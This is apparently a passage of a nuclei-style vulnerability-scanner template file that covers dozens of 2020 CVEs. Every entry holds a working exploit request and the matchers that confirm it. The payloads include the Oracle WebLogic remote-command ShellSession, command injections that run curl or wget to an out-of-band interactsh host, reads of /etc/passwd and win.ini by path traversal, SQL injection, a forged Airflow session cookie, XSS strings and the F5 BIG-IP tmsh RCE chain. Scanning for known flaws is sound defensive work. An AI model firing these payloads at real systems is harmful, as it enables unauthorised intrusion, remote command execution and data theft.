<max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E","{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: 